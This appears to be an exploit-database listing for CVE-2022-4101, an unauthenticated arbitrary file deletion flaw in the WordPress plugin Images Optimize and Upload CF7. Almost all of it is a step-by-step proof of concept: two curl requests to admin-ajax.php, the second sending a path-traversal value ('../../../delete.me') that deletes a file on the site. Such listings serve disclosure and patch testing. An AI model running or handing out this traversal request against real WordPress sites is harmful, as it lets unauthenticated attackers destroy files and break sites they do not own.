Exploit for Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion CVE-2022-4101

Name: Exploit for Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion CVE-2022-4101
Rating: 5 (55 reviews)

2022-12-21 | CVSS 1.0

## https://sploitus.com/exploit?id=WPEX-ID:2CE4C837-C62C-41AC-95CA-54BB1A6D1EEB
1. Install contact-form-7 (dependency)

2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3)

3. Invoke curl to create a potentially missing upload directory (required for the exploit to work):

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader'

4. Invoke the following curl command to delete the delete.me file at the root of the blog:

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete' \
    --data 'file=../../../delete.me'